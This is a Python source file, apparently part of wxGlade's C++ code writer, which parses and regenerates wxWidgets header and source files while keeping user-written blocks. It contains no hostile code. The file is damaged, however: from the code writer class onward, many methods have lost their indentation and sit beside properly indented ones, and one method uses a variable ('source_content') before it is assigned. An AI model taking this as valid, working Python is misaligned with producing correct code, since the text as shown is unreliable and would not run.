    @ivar event_handlers: dictionary of event handlers for each class
    @ivar header_content: Content of the header file
    @ivar source_content: Content of the source file"""
    rec_block_start = re.compile(
        r'^(?P<spaces>\s*)'             # leading spaces
        r'//\s*'                        # comment sign
        r'begin\s+wxGlade:\s*'          # "begin wxGlade:" statement and tailing spaces
        r'(?P<classname>\w*)'           # class or function name
        r'::'                           # separator between class and function / block (non-greedy)
        r'(?P<block>\w+)'               # function / block name
        r'\s*$'                         # tailing spaces
        )
    rec_block_end = re.compile(
        r'^\s*'                         # leading spaces
        r'//\s*'                        # comment sign
        r'end\s+wxGlade'                # "end exGlade" statement
        r'\s*$'                         # tailing spaces
        )
    rec_class_end = re.compile(
        r'^\s*};\s*'                    # closing curly brackets
        r'//\s*'                        # comment sign
        r'wxGlade:\s+end\s+class'       # "wxGlade: end class" statement
        r'\s*$'                         # tailing spaces
        )
    "Regexp to match last line of a class statement"
    rec_class_decl = re.compile(
        r'^\s*'                         # leading spaces
        r'class\s+([a-zA-Z_]\w*)'       # "class <name>" statement
        r'\s*'                          # tailing spaces
        )
    """Regexp to match class declarations
    This isn't very accurate - doesn't match template classes, nor virtual
    inheritance, but should be enough for most cases"""
    rec_decl_event_table = re.compile(
        r'^\s*'                                   # leading spaces
        r'DECLARE_EVENT_TABLE\s*\(\s*\)\s*;?'     # declaration of the event table
        r'\s*$'                                   # tailing spaces
        )
    "Regexp to match declaration of event table"
    rec_def_event_table = re.compile(
        r'^\s*'                                   # leading spaces
        r'BEGIN_EVENT_TABLE\s*\(\s*(\w+)\s*,\s*(\w+)\s*\)'
        r'\s*$'                                   # tailing spaces
        )
    "Regexp to match event table"
    rec_event_handler = re.compile(
        r'^\s*'                                   # leading spaces
        r'(?:virtual\s+)?'
        r'void\s+(?P<handler>[A-Za-z_]+\w*)'      # event handler name
        r'\s*'                                    # optional spaces
        r'\([A-Za-z_:0-9]+\s*&\s*\w*\)\s*;'
        r'\s*'                                    # optional spaces
        r'//\s*wxGlade:\s*<event_handler>'        # wxGlade event handler statement
        r'\s*$'                                   # tailing spaces
        )
    rec_event_handlers_marker = re.compile(
        r'^\s*'                                   # leading spaces
        r'//\s*wxGlade:\s*add\s+'
        r'((?:\w|:)+)\s+event handlers'
        r'\s*$'                                   # tailing spaces
        )
    "Regexp to match wxGlade comment of event handlers"
    def __init__(self, name, code_writer):
        # Parse the header/source pair *name* so only the wxGlade-managed
        # blocks will be regenerated; everything else is kept verbatim.
        # initialise new variables first
        self.header_content = None
        #self.source_content = None
        self.content = None
        self.event_table_decl = {}
        self.event_table_def = {}
        self.header_extension = code_writer.header_extension
        self.source_extension = code_writer.source_extension
        # call inherited constructor
        BaseSourceFileContent.__init__(self, name, code_writer)
    def replace_header(self, tag, content):
        """Replace *tag* inside the stored header file lines with *content*."""
        return _replace_tag(self.header_content, tag, content)
    def build_untouched_content(self):
        """Parse both the header and the source file: the lines outside
        wxGlade blocks are kept, the blocks are replaced by placeholder tags."""
        BaseSourceFileContent.build_untouched_content(self)
        self._build_untouched(self.name + "." + self.header_extension, True)
        BaseSourceFileContent.build_untouched_content(self)
        self._build_untouched(self.name + "." + self.source_extension, False)
    def _build_untouched(self, filename, is_header):
        """Scan *filename* line by line, keeping user code and replacing
        wxGlade blocks with tags marked with ``self.nonce``.

        is_header: True when parsing the header file -- only there class
        declarations and event handler declarations are tracked.
        """
        prev_was_handler = False
        events_tag_added = False
        inside_block = False
        inside_comment = False
        tmp_in = self._load_file(filename)
        out_lines = []
        check_old_methods = []  # list of indices with set_properties or do_layout
        for line in tmp_in:
            # rudimentary tracking of C-style /* ... */ comments, so that
            # wxGlade markers inside comments are ignored
            comment_index = line.find('/*')
            if not inside_comment and comment_index != -1 and comment_index > line.find('//'):
                inside_comment = True
            if inside_comment:
                end_index = line.find('*/')
                if end_index > comment_index:
                    inside_comment = False
            if not is_header:
                result = None
            else:
                result = self.rec_class_decl.match(line)
            if not inside_comment and not inside_block and result:
                if not self.class_name:
                    # this is the first class declared in the file: insert the new ones before this
                    out_lines.append( '<%swxGlade insert new_classes>' % self.nonce )
                    self.new_classes_inserted = True
                self.class_name = result.group(1)
                self.class_name = self.format_classname(self.class_name)
                self.classes.add( self.class_name )  # add the found class to the list of classes of this module
                out_lines.append(line)
            elif not inside_block:
                result = self.rec_block_start.match(line)
                if not inside_comment and result:
                    # replace the lines inside a wxGlade block with a tag that will be used later by add_class
                    spaces = result.group('spaces')
                    which_class = result.group('classname')
                    which_block = result.group('block')
                    if not which_class:
                        which_class = self.class_name
                    else:
                        which_class = self.format_classname(which_class)
                    self.spaces[which_class] = spaces
                    inside_block = True
                    if which_block in ("do_layout","set_properties"):
                        # probably to be removed
                        check_old_methods.append( len(out_lines) )
                    out_lines.append( '<%swxGlade replace %s %s>' %
                                      (self.nonce, result.group('classname'), result.group('block') ) )
                else:
                    dont_append = False
                    # ALB 2004-12-08 event handling support...
                    if is_header and not inside_comment:
                        result = self.rec_event_handler.match(line)
                        if result:
                            prev_was_handler = True
                            which_handler = result.group('handler')
                            which_class = self.class_name
                            self.event_handlers.setdefault( which_class, set() ).add( which_handler )
                        else:
                            if prev_was_handler:
                                # add extra event handlers here...
                                out_lines.append('<%swxGlade event_handlers %s>' % (self.nonce, self.class_name) )
                                prev_was_handler = False
                                events_tag_added = True
                            elif not events_tag_added and \
                                     self.is_end_of_class(line):
                                out_lines.append( '<%swxGlade event_handlers %s>' % (self.nonce, self.class_name) )
                            # now try to see if we already have a DECLARE_EVENT_TABLE
                            result = self.rec_decl_event_table.match(line)
                            if result:
                                self.event_table_decl[self.class_name] = True
                    elif not inside_comment:
                        result = self.rec_event_handlers_marker.match(line)
                        if result:
                            out_lines.append( '<%swxGlade add %s event handlers>' % (self.nonce, result.group(1)) )
                            dont_append = True
                        result = self.rec_def_event_table.match(line)
                        if result:
                            which_class = result.group(1)
                            self.event_table_def[which_class] = True
                    # ----------------------------------------
                    if not dont_append:
                        out_lines.append(line)
            else:
                # ignore all the lines inside a wxGlade block
                if self.rec_block_end.match(line):
                    inside_block = False
        if is_header and not self.new_classes_inserted:
            # if we are here, the previous ``version'' of the file did not contain any class, so we must add the
            # new_classes tag at the end of the file
            out_lines.append('<%swxGlade insert new_classes>' % self.nonce)
        # when moving from 0.9 to 1.0: remove empty methods "do_layout" and "set_properties"
        while check_old_methods:
            i = check_old_methods.pop(-1)
            if out_lines[i+1].strip()=='}':  # just end of block -> remove incl. trailing empty lines
                self._remove_method(out_lines, i-2, i+1)
        # set the ``persistent'' content of the file
        if is_header:
            self.header_content = out_lines
        else:
            self.content = out_lines
    def is_end_of_class(self, line):
        """Returns True if the line is the last line of a class
        Not really, but for wxglade-generated code it should work..."""
        return self.rec_class_end.match(line)
class ClassLines(BaseClassLines):
    """Stores the lines of C++ code for a custom class"""
    def __init__(self):
        BaseClassLines.__init__(self)
        self.ids = []  # Ids declared in the source (for Evt. handling): grouped in a public enum in the custom class
        self.sub_objs = []  # List of 2-tuples (type, name) of the sub-objects; attributes of the toplevel object
        self.extra_code_h = []  # Extra header code to output
        self.extra_code_cpp = []  # Extra source code to output
        self.dependencies = set()  # include-file dependencies, formatted by _format_dependencies() in finalize()
class CPPCodeWriter(BaseLangCodeWriter, wcodegen.CppMixin):
"""Code writer class for writing C++ code out of the designed GUI elements
source_extension: Extension of the source file
header_extension: Extension of the header file
last_generated_id: Last generated Id number (wxNewId() is not used yet)
tmpl_init_gettext: Template for inclusion of i18n headers and defining APP_CATALOG constant or None
see: BaseLangCodeWriter"""
ClassLines = ClassLines
_code_statements = {
'backgroundcolour': "%(objname)sSetBackgroundColour(%(value)s);\n",
'disabled': "%(objname)sEnable(0);\n",
'extraproperties': "%(objname)sSet%(propname_cap)s(%(value)s);\n",
'focused': "%(objname)sSetFocus();\n",
'foregroundcolour': "%(objname)sSetForegroundColour(%(value)s);\n",
'hidden': "%(objname)sHide();\n",
'setfont': "%(objname)sSetFont(wxFont(%(size)s, %(family)s, "
"%(style)s, %(weight)s, %(underlined)s, wxT(%(face)s)));\n",
'tooltip': "%(objname)sSetToolTip(%(tooltip)s);\n",
'wxcolour': "wxColour(%(value)s)",
'wxnullcolour': "wxNullColour",
'wxsystemcolour': "wxSystemSettings::GetColour(%(value)s)",
}
class_separator = '::'
language_note = \
'// Example for compiling a single file project under Linux using g++:\n' \
'// g++ MyApp.cpp $(wx-config --libs) $(wx-config --cxxflags) -o MyApp\n' \
'//\n' \
'// Example for compiling a multi file project under Linux using g++:\n' \
'// g++ main.cpp $(wx-config --libs) $(wx-config --cxxflags) -o MyApp Dialog1.cpp Frame1.cpp\n' \
'//\n'
output_name = None # If not None, name (without extension) of the file to write into
output_header = None # Temporary storage of header file for writing into (list)
output_file = None # Temporary storage of source file for writing into (list)
shebang = '// -*- C++ -*-\n//\n'
tmpl_cfunc_end = '}\n\n'
tmpl_sizeritem = '%s->Add(%s, %s, %s, %s);\n'
tmpl_sizeritem_button = '%s->AddButton(%s)\n'
tmpl_gridbagsizeritem = '%s->Add(%s, wxGBPosition%s, wxGBSpan%s, %s, %s);\n'
tmpl_gridbagsizerspacer = '%s->Add(%s, %s, wxGBPosition%s, wxGBSpan%s, %s, %s);\n'
tmpl_spacersize = '%s, %s'
tmpl_appfile = """\
%(overwrite)s\
%(header_lines)s\
#include "%(filename_top_win_class)s"
"""
tmpl_init_gettext = """\
#include <wx/intl.h>
#ifndef APP_CATALOG
#define APP_CATALOG "%(textdomain)s" // replace with the appropriate catalog name
#endif
"""
def _get_app_template(self, app, top_win):
'build template string for application'
if not self.app_name: return None
# XXX use Show() for frames/panels and ShowModal()/Destroy for dialogs
klass = app.klass
if self._use_gettext:
gettext1 = ["protected:", "%(tab)swxLocale m_locale; // locale we'll be using"]
gettext2 = ['%(tab)sm_locale.Init();',
'#ifdef APP_LOCALE_DIR',
'%(tab)sm_locale.AddCatalogLookupPathPrefix(wxT(APP_LOCALE_DIR));',
'#endif',
'%(tab)sm_locale.AddCatalog(wxT(APP_CATALOG));\n']
else:
gettext1 = gettext2 = []
if klass:
klass1 = 'class %(klass)s: public wxApp {'
klass2 = ['IMPLEMENT_APP(%(klass)s)\n',
'bool %(klass)s::OnInit()']
else:
klass1 = 'class MyApp: public wxApp {'
klass2 = ['IMPLEMENT_APP(MyApp)\n',
'bool MyApp::OnInit()',]
ret = ['', klass1,
'public:', '%(tab)sbool OnInit();'
] + gettext1 + ['};\n'] + klass2 + ['{'] + gettext2 + [
'%(tab)swxInitAllImageHandlers();',
'%(tab)s%(top_win_class)s* %(top_win)s = new %(top_win_class)s(NULL, wxID_ANY, wxEmptyString);',
'%(tab)sSetTopWindow(%(top_win)s);',
'%(tab)s%(top_win)s->Show();',
'%(tab)sreturn true;',
'}', '']
return '\n'.join(ret)
tmpl_empty_string = 'wxEmptyString'
    def init_lang(self, app=None):
        """Initialise C++ specific state for a code generation run.

        app: application/project object; when given, its source/header
             extension settings override the configured defaults.
        """
        self.last_generated_id = 1000
        self.generated_ids = {}
        # Extensions and main filename based on Project options when set
        if app is not None:
            self.source_extension = app.source_extension or config.default_source_extension
            self.header_extension = app.header_extension or config.default_header_extension
        else:
            self.source_extension = config.default_source_extension
            self.header_extension = config.default_header_extension
        if hasattr(app, "app_filename"):  # only for testing
            base = os.path.splitext(app.app_filename)[0]
        else:
            base = os.path.splitext(config.default_cpp_app_name)[0]
        self.app_filename = '%s.%s' % (base, self.source_extension)
        # boilerplate includes emitted at the top of the header file
        self.header_lines = [ '#include <wx/wx.h>\n',
                              '#include <wx/image.h>\n' ]
        # include i18n / gettext
        if self._use_gettext and self._textdomain:
            self.header_lines.append( self.tmpl_init_gettext % {'textdomain': self._textdomain} )
        # extra lines to generate (see the 'extracode' property of top-level widgets)
        self._current_extra_code_h = []
        self._current_extra_code_cpp = []
    def init_files(self, out_path):
        """Prepare output for *out_path*.

        In multi-file mode only the output directory is recorded.  In
        single-file mode, either the existing header/source pair is parsed
        (keeping user code) or fresh in-memory buffers are initialised with
        the include guard, boilerplate includes and placeholder tags.

        Returns an error message string if only one of the two files exists
        and overwriting is disabled; returns None on success.
        """
        if self.multiple_files:
            self.previous_source = None
            self.out_dir = out_path
        else:
            name = os.path.splitext(out_path)[0]
            self.output_name = name
            if not self._overwrite:
                header_exists = self._file_exists(name + "." + self.header_extension)
                source_exists = self._file_exists(name + "." + self.source_extension)
                if (header_exists and not source_exists) or (source_exists and not header_exists):
                    ret = _("To keep existing user code, both header and source file must exist.\n"
                            "(files '%s...'")
                    return ret%name
            # note: header_exists is only evaluated when not self._overwrite,
            # i.e. when it was bound in the block above (short-circuit)
            if not self._overwrite and header_exists:
                # keep all the lines not inside a wxGlade block.
                self.previous_source = SourceFileContent(name, self)
            else:
                # if the file doesn't exist, create it and write the intro
                self.previous_source = None
                self.output_header = []
                self.output_file = []
                # isolation directives
                oh = os.path.basename(name + "." + self.header_extension).upper().replace( '.', '_' )
                self.output_header.append('#ifndef %s\n#define %s\n' % (oh, oh))
                self.output_header.append('\n')
                for line in self.header_lines:
                    self.output_header.append(line)
                self.output_header.append('\n')
                # now, write the tags to store dependencies and extra code
                self.output_header.append('<%swxGlade replace dependencies>' % self.nonce)
                self.output_header.append('\n')
                self.output_header.append('<%swxGlade replace extracode>' % self.nonce)
                self.output_header.append('\n')
                self.output_file.append('#include "%s.%s"\n\n' % (os.path.basename(name), self.header_extension))
                self.output_file.append('<%swxGlade replace extracode>\n' % self.nonce)
                self.output_file.append('\n')
    def output_header_replace(self, tag, content):
        """Replace *tag* in the in-memory header buffer with *content*."""
        _replace_tag(self.output_header, tag, content)
def finalize(self):
if self.previous_source:
# insert all the new custom classes inside the old file
tag = '<%swxGlade insert new_classes>' % self.nonce
if self.previous_source.new_classes:
code = "".join([c[0] for c in self.previous_source.new_classes])
else:
code = ""
self.previous_source.replace_header(tag, code)
extra_source = "".join([c[1] for c in self.previous_source.new_classes])
# extra code (see the 'extracode' property of top-level widgets)
tag = '<%swxGlade replace extracode>' % self.nonce
code = self._tagcontent( '::extracode', self._current_extra_code_h )
self.previous_source.replace_header(tag, code)
code = self._tagcontent( '::extracode', self._current_extra_code_cpp )
self.previous_source.replace(tag, code)
# --------------------------------------------------------------
# now remove all the remaining <123415wxGlade ...> tags from the source:
# this may happen if we're not generating multiple files, and one of the container class names is changed
tags = re.compile( r'(<%swxGlade replace ([a-zA-Z_]*\w*) (\w+)>)' % self.nonce )
for i,line in enumerate(self.previous_source.header_content):
match = tags.match(line)
if not match: continue
tag = match.groups()
if tag[2] == 'dependencies':
#self._logger.debug('writing dependencies')
deps = set()
for code in self.classes.values():
deps.update(code.dependencies)
lines = self._format_dependencies( deps )
elif tag[2] == 'methods':
lines = ''
else:
lines = '// content of this block (%s) not found: did you rename this class?\n' % tag[2]
self.previous_source.replace_header(tag[0], lines)
# remove all the remaining <123415wxGlade ...> tags in source file XXX make more efficient
self._content_notfound( self.previous_source )
tag_start = r'<%swxGlade add ' % self.nonce
tag_end = r' event_handlers>'
for i, line in enumerate(self.previous_source.content):
if line.startswith(tag_start) and line.endswith(tag_end):
source_content.content[i] = ""
# write the new file contents to disk
header_content = "".join( self.previous_source.header_content )
self.save_file( self.previous_source.name + "." + self.header_extension, header_content, content_only=True )
if extra_source:
extra_source = '\n\n' + extra_source
source_content = "".join( self.previous_source.content )
self.save_file( self.previous_source.name + "." + self.source_extension, source_content + extra_source,
content_only=True )
elif not self.multiple_files:
oh = os.path.basename(self.output_name).upper() + '_H'
self.output_header.append('\n#endif // %s\n' % oh)
# write the list of include files
deps = set()
for code in self.classes.values():
deps.update(code.dependencies)
code = self._format_dependencies( deps )
self.output_header_replace( '<%swxGlade replace dependencies>' % self.nonce, code )
# extra code (see the 'extracode' property of top-level widgets)
tag = '<%swxGlade replace extracode>' % self.nonce
code = self._tagcontent('::extracode', self._current_extra_code_h)
self.output_header_replace( tag, code )
code = self._tagcontent('::extracode', self._current_extra_code_cpp)
self.output_file_replace( tag, code )
self.save_file( self.output_name + "." + self.header_extension, self.output_header, self._app_added )
self.save_file( self.output_name + "." + self.source_extension, self.output_file, self._app_added )
self.output_file = self.output_header = None
    def add_app(self, app_attrs, top_win):
        """Generate the code for the application startup file.

        Adds the C++-only mapping 'filename_top_win_class' (used by
        tmpl_appfile's %(filename_top_win_class)s placeholder) and then
        delegates to the base class implementation.
        """
        # add language specific mappings
        self.lang_mapping['filename_top_win_class'] = '%s.%s' % (top_win.klass, self.header_extension)
        BaseLangCodeWriter.add_app(self, app_attrs, top_win)
def add_class(self, code_obj):
assert code_obj not in self.classes
try:
builder = self.obj_builders[code_obj.WX_CLASS]
except KeyError:
logging.error('%s', code_obj)
# this is an error, let the exception be raised; the details are logged by the global exception handler
raise
ret = self.classes[code_obj] = self.ClassLines() # ClassLines will collect the code lines incl. children
return ret
def finalize_class(self, code_obj):
"""Emit the complete C++ code for one class: the declaration into the header
buffer/file and the implementation (constructor, event table, handler stubs)
into the source buffer/file.

Works in two modes: fresh generation (is_new) writes full class skeletons;
"keep existing user code" mode (prev_src set) only replaces the content of
the wxGlade-tagged blocks inside the previously generated files.
NOTE(review): this extract lost its indentation; code lines kept verbatim.
"""
# write the collected code for the class and its children
base = code_obj.WX_CLASS
klass = self.classes[code_obj]
classname = code_obj.klass
fmt_klass = self.cn_class(classname)
if self.multiple_files:
# let's see if the file to generate exists, and in this case create a SourceFileContent instance
filename = os.path.join(self.out_dir, classname.replace('::', '_') + "." + self.header_extension)
if self._overwrite or not self._file_exists(filename):
prev_src = None
else:
prev_src = SourceFileContent( os.path.join(self.out_dir, classname), self )
else:
# in this case, previous_source is the SourceFileContent instance
# that keeps info about the single file to generate
prev_src = self.previous_source
if prev_src and classname in prev_src.classes:
is_new = False
else:
# this class wasn't in the previous version of the source (if any)
is_new = True
builder = self.obj_builders[base]
mycn = getattr(builder, 'cn', self.cn)
mycn_f = getattr(builder, 'cn_f', self.cn_f)
# collect all event handlers
event_handlers = klass.event_handlers
for win_id, evt, handler, evt_type in builder.get_event_handlers(code_obj):
event_handlers.append((win_id, mycn(evt), handler, evt_type))
# try to see if there's some extra code to add to this class
extra_code = getattr(builder, 'extracode', getattr(code_obj, 'extracode', "") or "")
if extra_code:
extra_code = re.sub(r'\\n', '\n', extra_code)
extra_code = re.split(re.compile(r'^###\s*$', re.M), extra_code, 1)
klass.extra_code_h.append(extra_code[0])
if len(extra_code) > 1:
klass.extra_code_cpp.append(extra_code[1])
if not is_new:
self.warning( '%s has extra code, but you are not overwriting existing sources:'
' please check that the resulting code is correct!' % code_obj.name )
if not self.multiple_files:
if klass.extra_code_h:
self._current_extra_code_h.append( "".join( klass.extra_code_h[::-1] ) )
if klass.extra_code_cpp:
self._current_extra_code_cpp.append( "".join( klass.extra_code_cpp[::-1] ) )
# build the constructor signature: declaration with defaults (sign_decl1),
# declaration without defaults (sign_decl2) and the plain argument list (sign_inst)
default_sign = [('wxWindow*', 'parent'), ('wxWindowID', 'id')]
sign = getattr(builder, 'constructor', default_sign)
defaults = []
for t in sign:
if len(t) == 3:
defaults.append(t[2])
else:
defaults.append(None)
tmp_sign = [t[0] + ' ' + t[1] for t in sign]
sign_decl2 = ', '.join(tmp_sign)
for i in range(len(tmp_sign)):
if defaults[i]:
tmp_sign[i] += '=%s' % defaults[i]
sign_decl1 = ', '.join(tmp_sign)
sign_inst = ', '.join([t[1] for t in sign])
# custom base classes support
custom_base = code_obj.check_prop_nodefault('custom_base') and code_obj.custom_base.strip() or None
# the header and code lines
header_buffer = []
source_buffer = []
hwrite = header_buffer.append
swrite = source_buffer.append
# generate constructor code
if is_new:
pass
elif custom_base:
# custom base classes set, but "overwrite existing sources" not
# set. Issue a warning about this
self.warning( '%s has custom base classes, but you are not overwriting existing sources: '
'please check that the resulting code is correct!' % code_obj.name )
if is_new:
# header file
if custom_base:
base = ", public ".join([b.strip() for b in custom_base.split(',')])
hwrite('\nclass %s: public %s {\n' % (fmt_klass, base))
hwrite('public:\n')
# the first thing to add is the enum of the various ids
if self._mark_blocks:
hwrite(self.tabs(1) + '// begin wxGlade: %s::ids\n' % fmt_klass)
ids = klass.ids
# let's try to see if there are extra ids to add to the enum
if hasattr(builder, 'get_ids_code'):
ids.extend(builder.get_ids_code(code_obj))
if ids:
hwrite(self.tabs(1) + 'enum {\n')
for id_name in ids:
hwrite('%s%s,\n' % (self.tabs(2), id_name))
hwrite(self.tabs(1) + '};\n')
if self._mark_blocks:
hwrite(self.tabs(1) + '// end wxGlade\n\n')
# constructor prototype
hwrite(self.tabs(1) + '%s(%s);\n' % (fmt_klass, sign_decl1))
hwrite('\nprivate:\n')
# declarations of the attributes
hwrite('\n')
hwrite('protected:\n')
hwrite(self.tabs(1) + '// begin wxGlade: %s::attributes\n' % fmt_klass)
for o_type, o_name in klass.sub_objs:
hwrite(self.tabs(1) + '%s* %s;\n' % (o_type, o_name))
hwrite(self.tabs(1) + '// end wxGlade\n')
if event_handlers:
t = self.tabs(1)
hwrite('\n' + t + 'DECLARE_EVENT_TABLE();\n')
hwrite('\npublic:\n')
already_there = set()
for win_id, evt, handler, evt_type in event_handlers:
if handler not in already_there:
hwrite('%svirtual void %s(%s &event); // wxGlade: <event_handler>\n' % (t, handler, evt_type))
already_there.add( handler )
hwrite('}; // wxGlade: end class\n\n')
elif prev_src:
if self._mark_blocks:
hwrite(self.tabs(1) + '// begin wxGlade: %s::ids\n' % fmt_klass)
ids = klass.ids
# let's try to see if there are extra ids to add to the enum
if hasattr(builder, 'get_ids_code'):
ids.extend(builder.get_ids_code(code_obj))
if ids:
hwrite(self.tabs(1) + 'enum {\n')
for id_name in ids:
hwrite('%s%s,\n' % (self.tabs(2), id_name))
hwrite(self.tabs(1) + '};\n')
if self._mark_blocks:
hwrite(self.tabs(1) + '// end wxGlade\n')
tag = '<%swxGlade replace %s ids>' % (self.nonce, classname)
if not prev_src.replace_header( tag, "".join(header_buffer) ):
# no ids tag found, issue a warning and do nothing
self.warning("wxGlade ids block not found for %s, ids declarations code NOT generated" % code_obj.name)
# remove methods block if in old file
tag = '<%swxGlade replace %s methods>' % (self.nonce, classname)
prev_src.replace_header(tag, [])
header_buffer = []
hwrite = header_buffer.append
if self._mark_blocks:
hwrite(self.tabs(1) + '// begin wxGlade: %s::attributes\n' % fmt_klass)
for o_type, o_name in klass.sub_objs:
hwrite(self.tabs(1) + '%s* %s;\n' % (o_type, o_name))
if self._mark_blocks:
hwrite(self.tabs(1) + '// end wxGlade\n')
tag = '<%swxGlade replace %s attributes>' % (self.nonce, classname)
if not prev_src.replace_header(tag, "".join(header_buffer)):
# no attributes tag found, issue a warning and do nothing
self.warning( "wxGlade attributes block not found for %s, attributes declarations code NOT generated" %
code_obj.name )
header_buffer = []
hwrite = header_buffer.append
if event_handlers:
already_there = prev_src.event_handlers.get(classname, set())
t = self.tabs(1)
for win_id, evt, handler, evt_type in event_handlers:
if handler not in already_there:
hwrite('%svirtual void %s(%s &event); // wxGlade: <event_handler>\n' % (t, handler, evt_type))
already_there.add( handler )
if classname not in prev_src.event_table_def:
hwrite('\nprotected:\n')
hwrite(self.tabs(1) + 'DECLARE_EVENT_TABLE()\n')
tag = '<%swxGlade event_handlers %s>' % (self.nonce, classname)
if not prev_src.replace_header( tag, "".join(header_buffer) ):
# no attributes tag found, issue a warning and do nothing
self.warning( "wxGlade events block not found for %s, event table code NOT generated" % code_obj.name )
# source file
tab = self.tabs(1)
# set the window's style
style_p = code_obj.properties.get("style")
if style_p and style_p.value_set != style_p.default_value:
style = mycn_f(style_p.get_string_value())
if style:
# NOTE(review): textual replacement — relies on the constructor argument being literally named 'style'
sign_inst = sign_inst.replace('style', '%s' % style)
# constructor
if is_new:
base = "%s(%s)" % (base, sign_inst)
if custom_base:
bases = [b.strip() for b in custom_base.split(',')]
if bases:
base = "%s(%s)" % (bases[0], sign_inst)
rest = ", ".join([b + "()" for b in bases[1:]])
if rest:
base += ", " + rest
swrite('\n%s::%s(%s):\n%s%s\n{\n' % (fmt_klass, fmt_klass, sign_decl2, tab, base) )
if self._mark_blocks:
swrite(tab + '// begin wxGlade: %s::%s\n' % (fmt_klass, fmt_klass))
# the optional initial code from the code properties
if not self.preview and code_obj.check_prop("extracode_pre"):
for l in code_obj.properties["extracode_pre"].get_lines():
swrite(tab + l)
# set size here to avoid problems with splitter windows
if 'size' in code_obj.properties and code_obj.properties["size"].is_active():
swrite( tab + self.generate_code_size(code_obj) )
for l in builder.get_properties_code(code_obj):
swrite(tab + l)
for l in klass.init:
swrite(tab + l)
if klass.final:
swrite(tab + "\n")
for l in klass.final:
swrite(tab + l)
for l in builder.get_layout_code(code_obj):
swrite(tab + l)
# the optional final code from the code properties
if not self.preview and code_obj.check_prop("extracode_post"):
for l in code_obj.properties["extracode_post"].get_lines():
swrite(tab + l)
# now check if there are extra lines to add to the constructor
for l in builder.get_init_code(code_obj):
swrite(tab + l)
swrite( self.tmpl_ctor_call_layout % {'tab':tab} )
if self._mark_blocks:
# end tag
swrite('%s%s end wxGlade\n' % (tab, self.comment_sign))
# write class function end statement
if self.tmpl_cfunc_end and is_new:
swrite( self.tmpl_cfunc_end % {'tab':tab} )
# replace code inside existing constructor block
if prev_src and not is_new:
# replace the lines inside the ctor wxGlade block
# with the new ones
tag = '<%swxGlade replace %s %s>' % (self.nonce, classname, classname)
if not prev_src.replace( tag, "".join(source_buffer) ):
# no constructor tag found, issue a warning and do nothing
self.warning( "wxGlade %s::%s block not found, relative code NOT generated" % (fmt_klass, fmt_klass) )
source_buffer = []
swrite = source_buffer.append
# generate code for event table
code_lines = self.generate_code_event_table( code_obj, is_new, tab, prev_src, event_handlers )
if prev_src and not is_new:
tag = '<%swxGlade replace %s event_table>' % (self.nonce, classname)
if not prev_src.replace( tag, "".join(code_lines) ):
# no constructor tag found, issue a warning and do nothing
self.warning( "wxGlade %s::event_table block not found, relative code NOT generated" % fmt_klass )
else:
source_buffer.extend(code_lines)
# generate code for event handler stubs
code_lines = self.generate_code_event_handler( code_obj, is_new, tab, prev_src, event_handlers )
# replace code inside existing event handlers
if prev_src and not is_new:
tag = '<%swxGlade add %s event handlers>' % (self.nonce, classname)
if not prev_src.replace( tag, "".join(code_lines) ):
# no constructor tag found, issue a warning and do nothing
self.warning( "wxGlade %s event handlers marker not found, relative code NOT generated" % fmt_klass )
else:
source_buffer.extend(code_lines)
if not self.multiple_files and prev_src:
# if this is a new class, add its code to the new_classes list of the SourceFileContent instance
if is_new:
prev_src.new_classes.append( ("".join(header_buffer), "".join(source_buffer)) )
return
# multiple-file mode: write this class into its own <classname>.h / <classname>.cpp pair
if self.multiple_files:
if base in self.obj_builders:
klass.dependencies.update( getattr(self.obj_builders[base], 'import_modules', []) )
if prev_src:
tag = '<%swxGlade insert new_classes>' % self.nonce
prev_src.replace_header(tag, "")
# insert the module dependencies of this class
# WARNING: there's a double space ' ' between 'replace' and 'dependencies' in the tag below,
# because there is no class name (see SourceFileContent, line ~147)
tag = '<%swxGlade replace dependencies>' % self.nonce
code = self._format_dependencies(klass.dependencies)
prev_src.replace_header(tag, code)
# insert the extra code of this class
extra_code_h = "".join(klass.extra_code_h[::-1])
extra_code_cpp = "".join(klass.extra_code_cpp[::-1])
# if there's extra code but we are not overwriting existing sources, warn the user
if extra_code_h or extra_code_cpp:
self.warning( '%s (or one of its children) has extra code classes, but you are not overwriting '
'existing sources: please check that the resulting code is correct!' % code_obj.name )
extra_code_h = self._tagcontent("::extracode", extra_code_h)
extra_code_cpp = self._tagcontent("::extracode", extra_code_cpp)
tag = '<%swxGlade replace extracode>' % self.nonce
prev_src.replace_header(tag, extra_code_h)
prev_src.replace(tag, extra_code_cpp)
# store the new file contents to disk
name = os.path.join(self.out_dir, classname)
self.save_file( name +"."+ self.header_extension, "".join(prev_src.header_content), content_only=True )
self.save_file( name +"."+ self.source_extension, "".join(prev_src.content), content_only=True )
return
# create the new source file
header_file = os.path.join(self.out_dir, classname + "." + self.header_extension)
source_file = os.path.join(self.out_dir, classname + "." + self.source_extension)
hout = []
sout = []
# header file ----------------------------------------------------------------------------------------------
# isolation directives
hn = os.path.basename(header_file).upper().replace('.', '_')
hout.append('#ifndef %s\n#define %s\n' % (hn, hn))
hout.append('\n')
# write the common lines
hout.extend( self.header_lines )
hout.append('\n')
# write the module dependencies for this class
code = self._format_dependencies(klass.dependencies)
hout.append(code)
hout.append('\n')
# insert the extra code of this class
extra_code_h = "".join(klass.extra_code_h[::-1])
extra_code_h = self._tagcontent('::extracode', extra_code_h)
hout.append(extra_code_h)
hout.append('\n')
# write the class body
for line in header_buffer:
hout.append(line)
hout.append('\n#endif // %s\n' % hn)
# source file ----------------------------------------------------------------------------------------------
# write the common lines
sout.append(self.header_lines[0])
sout.append('#include "%s"\n\n' % os.path.basename(header_file))
# insert the extra code of this class
extra_code_cpp = "".join(klass.extra_code_cpp[::-1])
extra_code_cpp = self._tagcontent('::extracode', extra_code_cpp)
sout.append(extra_code_cpp)
sout.append('\n')
# write the class implementation
sout.extend(source_buffer)
# store source to disk
self.save_file(header_file, hout)
self.save_file(source_file, sout)
else: # not self.multiple_files
# write the class body onto the single source file
self.output_header.extend(header_buffer)
self.output_file.extend(source_buffer)
def add_object(self, klass, parent, parent_builder, obj):
    """Add the generated code for one object (widget or sizer) to the
    ClassLines container of its owning class.

    klass: ClassLines instance collecting the code for the owning class
    parent: the parent object of obj
    parent_builder: builder of the parent (sizer/notebook); when set, its
        get_code_per_child() lines (e.g. sizer->Add) are appended as well
    obj: the object to generate code for

    Returns the widget builder that was used, or None when no builder is
    available for this object.
    """
    # get the widget builder instance
    builder = self._get_object_builder(klass, obj)
    if not builder:
        return None
    try:
        init, ids, final = builder.get_code(obj)
    except:
        print(obj)
        raise  # this shouldn't happen
